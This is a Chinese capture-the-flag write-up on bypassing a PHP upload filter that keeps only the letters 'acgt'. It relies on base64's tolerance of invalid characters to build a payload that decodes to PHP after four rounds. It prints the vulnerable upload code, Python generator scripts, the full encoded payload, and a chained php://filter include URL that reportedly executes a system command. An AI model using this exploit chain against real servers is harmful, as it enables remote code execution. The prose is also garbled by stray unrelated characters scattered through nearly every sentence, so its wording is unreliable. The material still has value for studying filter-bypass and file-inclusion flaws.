這個(gè)題的解法是王一航大佬給我的啟發(fā)睦裳,可以膜一膜大佬的簡(jiǎn)書置逻,真的很6
附鏈接:http://www.reibang.com/u/bf30f18c872c
題目背景
這個(gè)題目可以通過php的偽協(xié)議直接讀取到源碼,難點(diǎn)就是源碼里的正則過濾券坞。本題將初acgt以外的所有字符全部去掉了。于是恨锚,我們無法上傳正常的木馬
<?php
error_reporting(0);
session_start();
if (isset($_FILES[file]) && $_FILES[file]['size'] < 65536) {
$d = "./tmp/" . md5(session_id());
@mkdir($d);
$b = "$d/" . pathinfo($_FILES[file][name], 8);
file_put_contents($b, preg_replace('/[^acgt]/is', '', file_get_contents($_FILES[file][tmp . "_name"])));
echo $b;
}
?>
思路
看到王一航大佬在博客里提及用base64來解猴伶,恍然大悟。
base64特性
base64是有容錯(cuò)機(jī)制的他挎,可以嘗試一下
看下圖
這個(gè)圖办桨,我們首先測(cè)試了一下aaaa作為base64編碼時(shí)的源碼是多少,我們可以在圖中看到损姜。
之后,我們測(cè)試了iiii作為base64編碼時(shí)源碼是多少摧阅。最后我們使用aaaaaaaaaaaaaaaa作為base64編碼绷蹲,發(fā)現(xiàn)源碼和iiii相同。
這里娇跟,base64使用的字符只有64個(gè)太颤,除了這64個(gè)字符外,其他字符在解碼時(shí)會(huì)被忽略龄章,也就是之前所謂的容錯(cuò)性
那么乞封,利用這個(gè)特性肃晚,我們結(jié)合上面的例子仔戈,只能有a一個(gè)字符存在時(shí),我們可以通過base64的解碼监徘,創(chuàng)造出i,以此類推,當(dāng)解碼次數(shù)增多時(shí)墓卦,就可以通過極少的字符户敬,拓展到64個(gè)字符,進(jìn)而實(shí)現(xiàn)一切文字的base64編碼
實(shí)現(xiàn)
首先忠怖,我們先利用可以使用的acgtACGT來進(jìn)行排列組合抄瑟,來拓展字符,之后,反復(fù)利用往衷,來達(dá)到目的
list_use = 'acgtACGT'
can_see = 'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789+/='
def make_list(list_now,id):
result = ''
with open("./list_"+id+".txt","a+") as f:
for i in list_now:
for j in list_now:
for k in list_now:
for l in list_now:
sourlist = i+j+k+l
ordlist = sourlist.decode("base64")
for z in ordlist:
if z in can_see:
result += z
if len(result) == 1:
f.writelines(sourlist+"******"+result+"\n")
result = ''
這里,我貼了一個(gè)函數(shù)布轿,編程方式采用了很簡(jiǎn)單来颤,很粗暴的方式,將排列組合的所以內(nèi)容寫入文件萝毛。簡(jiǎn)單粗暴,易懂笆包,雖然很low。庵佣。。通今。肛根。。
之后晶通,我們將文件里的內(nèi)容整理一下,就是不要出現(xiàn)重復(fù)的拓展字符
def do_list(id):
a_list = ''
with open("./list_"+id+".txt","rb") as f:
x = f.read()
x = x.split('\n')
for i in x:
sour = i.split('******')
#print i
#print sour
mid_1 = sour[0]
mid_2 = sour[1][0]
if mid_2 not in a_list:
a_list += mid_2
with open("./list_do"+id+".txt","a+") as fb:
fb.writelines(mid_1+"******"+mid_2+"\n")
return a_list
同樣簡(jiǎn)單粗暴一也,是不是很傻喉脖,很可愛。將整理完的文件另存
def change(id,ord_base):
result = ''
mid_1 = []
mid_2 = []
with open("./list_do"+id+".txt","rb") as f:
x = f.read()
x = x.split('\n')
for i in x:
sour = i.split('******')
#print i
#print sour
mid_1.append(sour[0])
mid_2.append(sour[1][0])
for j in ord_base:
num = mid_2.index(j)
result += mid_1[num]
return result
最后舆蝴,這個(gè)就是轉(zhuǎn)換的過程题诵,就是從目標(biāo)字符的base64編碼,向下轉(zhuǎn)換赠潦,直到只有acgt出現(xiàn)
結(jié)果
我得到了這個(gè)文件:
aaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatGgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaagatGaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaaaaagGcagTGaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaaTaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgattaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcTAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattgTaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaaAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgCtcaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaagGcagTGaaaaaaaaaaAaaaAaaaaaaaaaaaAaagatCaaaaaaaaaAaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaagatagCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgGaaaaaaaaaaaaaaaAaaagaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgGaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaaaaagGcagTGaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatCaaaaaaaaaAaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaagaaTAaaaaaaaaaagatGaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgGaaaaaaaaaaaaaaaAaaaAaaaaaaaaaaaAaacaaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaTaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgatTaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacgaaaaaaaaaaaAaaaAaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaagataaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtccaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaTaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatTaaaaaaaaaaaaaAaaaAaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaaTaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatGgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaagatagCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaagatCgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaagattaaaa
各位可以把它base64解碼4次,就得到了我們需要的東西
那么哩俭,這就完成了
解題
因?yàn)槲抑饕プ⒁鈛pload.php了,所以凡资,沒有保存其他的源碼,本地復(fù)現(xiàn)诅岩,也就直接寫個(gè)頁面讳苦,include就行
那么我們將生成的文件名字設(shè)置為exp.php.txt带膜,這點(diǎn)比較簡(jiǎn)單
上傳上去就變成了exp.php
然后在包含的頁面,我們可以這樣寫
url如下:
http://127.0.0.1/2017xdctf/include.php?file=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=./tmp/8a1b5fc5f0fe17e9ba8538a991871371/exp.php
結(jié)果:
可以看到鸳谜,dir命令執(zhí)行了
